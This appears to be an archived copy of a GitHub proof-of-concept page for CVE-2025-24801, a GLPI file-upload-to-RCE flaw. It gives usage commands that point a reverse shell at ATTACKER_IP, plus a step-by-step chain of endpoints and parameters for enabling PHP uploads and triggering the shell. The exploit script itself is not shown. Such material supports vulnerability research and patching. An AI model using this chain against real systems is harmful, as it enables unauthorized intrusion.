Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24801 PoC — GLPI 代码问题漏洞

Source
https://github.com/fatkz/CVE-2025-24801
Associated Vulnerability
Title:GLPI 代码问题漏洞 (CVE-2025-24801)
Description:GLPI是GLPI开源的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,你可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。 GLPI存在代码问题漏洞,该漏洞源于认证用户可以上传并强制执行位于GLPI服务器上的php文件。
Description
CVE-2025-24801 Exploit
Readme
# CVE-2025-24801 PoC for GLPI RCE

This repository contains a proof-of-concept script (`poc.py`) that exploits CVE-2025-24801, an LFI-to-RCE vulnerability in GLPI 10.0.17. It automates:

* Logging into GLPI
* Enabling `.php` uploads by updating document type settings
* Uploading a PHP reverse shell via the AJAX file upload endpoint

## 🛠️ Installation

```bash
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
```

## 🚀 Usage

```bash
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
```

* `--url`: Base URL of the GLPI instance (e.g. `https://example.com/glpi`)
* `--user` / `--password`: Valid GLPI technician credentials
* `--lhost` / `--lport`: Attacker IP and port for the reverse shell listener

The script automatically uses `--doc-id 1` by default to update the first document type.

After execution, the script will:

1. Log in and establish a session
2. Enable `.php` uploads by updating document type ID 1
3. Upload `exploit.php` containing a PHP reverse shell payload

You will then need to manually trigger the LFI by specifying the uploaded filename in the PDF font include (e.g., via the report export feature) to achieve RCE.

## 📑 How It Works

1. **Login**: Extracts the CSRF token from `/front/login.php` and posts credentials to authenticate.
2. **Enable PHP Uploads**: Fetches `/front/documenttype.form.php?id=1`, parses the CSRF token, and adds `php` to the allowed extensions.
3. **Upload Shell**: Fetches `/front/ticket.form.php` for a CSRF token, then uses `/ajax/fileupload.php` (with `X-Requested-With: XMLHttpRequest`) to upload a PHP reverse shell.
4. **Trigger RCE**: Manually invoke the PDF font LFI by specifying the uploaded shell filename in the `pdffont` parameter during report export.

## ⚠️ Disclaimer

This tool is intended for authorized security testing and educational purposes only. Do not use it against systems without explicit permission.

---

*Created for educational and authorized pentesting purposes.*
File Snapshot

 [4.0K]  /data/pocs/94d2be6aee5264a2b6228640fdbc2ce8845e3718
├── [2.8K]  exploit.py
├── [2.1K]  README.md
└── [  40]  requirements.txt

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.